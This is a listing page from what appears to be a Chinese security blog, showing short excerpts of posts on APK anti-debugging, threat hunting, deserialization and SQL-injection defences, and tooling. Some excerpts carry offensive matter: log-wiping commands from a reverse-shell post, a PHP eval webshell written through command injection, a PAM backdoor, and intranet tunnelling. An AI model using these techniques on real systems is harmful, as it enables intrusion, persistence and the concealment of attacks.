加载中
Anti-debugging Skills in APK

0x00 时间相关反调试 通过计算某部分代码的执行时间差来判断是否被调试,在Linux内核下可以通过time、gettimeofday,或者直接通过sys call来获取当前时间。另外,还可以通过自定义SIGALRM信号...

2017/12/04 12:28
166
python 反弹shell,加了UDP

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 cat /dev/null > /var/run/utmp cat /dev/null > /var...

2017/03/20 13:53
96
威胁狩猎简介<译文>

什么是威胁狩猎 威胁狩猎也被叫做威胁搜索、网络狩猎或者网络威胁搜索,他不同于apt攻击或者红蓝军渗透测试这类模拟攻击者攻寻找黑入IT设施漏洞的行为。 在威胁狩猎中,安全专家们会打破常规...

09/06 15:57
31
cmd的一个好替代品

ConEmu设置当前目录打开右键菜单 打开设置 win+alt+p 或者 如图打开 ConEmu 打开Integreation 如图填写 cmd -cur_console:n %P

2016/09/19 10:11
28
burpsutie测试 使用夜神模拟器的方法

夜神模拟器是我用过兼容性相对比较好的模拟器 第一步 设置代理ip(默认最后的一个数字改成2就是网关) 第二步 burp开启全监听 第三步 打开http://burp 下载证书 安装火狐的证书 并导出为crt...

nmap实现 自动发现web漏洞的思路

local http = require "http" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" -- 作者 author = "k4n5ha0" -- 授权 lic...

05/31 15:35
271
缓解java执行命令抵御反序列化漏洞的实现方案

最近st2 框架又出漏洞了 一大堆java被执行命令了 这里我提一个解决方案 可以适当缓解服务端被漏洞进行rce漏洞的问题 LD_PRELOAD替换进程底层函数 首先请看这篇文章 如果是某位c++的大佬 您老...

光盘安装ubuntu出现BusyBox不能继续安装的终极解决方法

ubuntu server出现busybox initramfs错误 把里面的quiet 修改为all_generic_ide回车就可正常安装 直接按一下f6就 再esc就可以修改了...

02/20 21:19
186
改造mybatis抵御sql注入的研究和SDL的思考

这段时间看了百度的openrasp的源代码和相关资料 (地址:https://rasp.baidu.com) 在实施的过程中还是遇到了很多的阻力,所以开始自己调研相关的技术方案 我觉得能在研发阶段就能使程序员适应安...

LD_PRELOAD替换进程底层函数

LD_PRELOAD是什么 LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的...

05/16 09:13
152
golang快速生成api

装好golang 装好git git config --global https.proxy 'socks5://127.0.0.1:1080' git config --global http.sslVerify false 删除 git config --global --unset http.proxy git config --...

2017/04/25 20:55
136
wifi 劫持安装

sudo dpkg -i wifi-pumpkin-0.8.4-all.deb apt-get -f -y install 安装失败的化 执行下面这句话 再安装 sudo apt-get install gdebi-core sudo gdebi /path/to/filename.deb 判断网卡驱动 mo...

2017/05/05 20:42
129
ubuntu 16.04 安卓 4.4.4编译 + 调试

先更新 apt update -y && apt upgrade -y sudo apt-get install libreadline6-dev:i386 libgl1-mesa-dev g++-multilib tofrodos python-markdown libxml2-utils xsltproc zlib1g-dev:i386...

2017/10/16 12:01
104
pam后门 和应用实例

pam发现了一个具体情况做一下记录 顺便把安装方式重新写一遍 rpm -qa | grep pam #查看pam版本 pam-1.1.1 看这个版本号 http://www.linux-pam.org/library/ 下载对应版本 修改modlues/pam_u...

PAM
2016/09/02 19:36
102
互联网威胁狩猎框架 白皮书

1:威胁狩猎的定义 我们将狩猎定义为在网络中主动和迭代的进行搜索的行动,以发现并进一步隔绝针对现有安全策略的高级威胁。威胁猎人可能会用许多不同的安全技术来终结攻击者的攻击,问题在于...

04/03 12:10
101
win10上使用cain

点以太网 注意选择自己想要使用的cain网络做如下设置 设置v4和v6 点高级 在dns中选中此两项 设置完成后 安装npcap 安装过程中 会跳出一页要选中支持 winpcap api一项 最好除了那个 administ...

2017/08/23 09:22
93
windows 10右键项添加Notepad++ 和插件管理

1.打开注册表编辑器,开始->运行->regedit。 2.在HKEY_CLASSSES_ROOT→ * → Shell 下,在Shell下,新建项命名为Open With Notepad++,在该新建项的右边窗口新建字符串值(右键--新建--字符串...

04/18 09:17
89
内网渗透之socks5代理(reGeorg+proxifier详细配置说明)

抄袭于http://www.tuicool.com/articles/JNRn6nY 反正按照图片照做就是了 主要是利用80隧道做一个安全数据

2016/10/19 10:13
73
Cmder- ls 命令无法显示中文目录问题

在Settings > Startup > Environment里添加: set LANG=zh_CN.UTF8

2017/02/11 23:05
71
命令注入写webshell

利用命令注入写一句话php webshell到web目录涉及到一些特殊字符的转义,假设需要写入 <?php eval($_POST[pandas]); ?>,方法如下: WINDOWS:用^转义<,即执行echo ^<?php eval($_POST[panda...

2017/03/10 16:45
70

没有更多内容

加载失败,请刷新页面

返回顶部
顶部